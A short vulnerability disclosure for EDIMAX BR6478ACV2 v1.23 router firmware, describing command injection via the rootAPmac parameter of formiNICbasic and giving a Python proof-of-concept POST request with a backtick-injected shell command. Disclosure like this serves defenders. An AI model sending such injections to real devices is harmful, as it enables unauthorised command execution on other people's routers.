Overview

Affected version

BR6478ACV2_v1.23

Vulnerability details

The EDIMAX BR6478ACV2_v1.23 firmware has a command injection vulnerability in the formiNICbasic function. The variable v432 receives the rootAPmac parameter from a POST request. Because the user controls this input and it is passed to a system() call, it can cause command injection.


POC

import requests

ip = "192.168.2.1"

data = {
    "use_apmode":        "",
    "mssidSelect":       "0",
    "enableMSSID":       "",
    "wlanDisabled":      "",
    "wlan0Enable":       "1",
    "isRepeaterBasicUI": "",
    "vlanid":            "",
    "wireless_block_relay": "",
    "apMode":            "",
    "band":              "",
    "secchan":           "",
    "chan":               "",
    "hiddenSSID":        "",
    "hiddenSSID2g":      "",
    "autoMacClone":      "",
    "ssid":              "",
    "repUseCrossBand":   "",
    "force_enable2g5g_ap": "",
    "method":            "",
    "iqsetupclose":      "",
    "submit-url":        "",
    "doConnectTest":     "1",
    "rootAPmac":         "'`ps>/1.txt`'",
    "isApply":           "",
}
url = f'http://{ip}/goform/formiNICbasic'

res = requests.post(url=url, data=data, verify=False)
print(res)
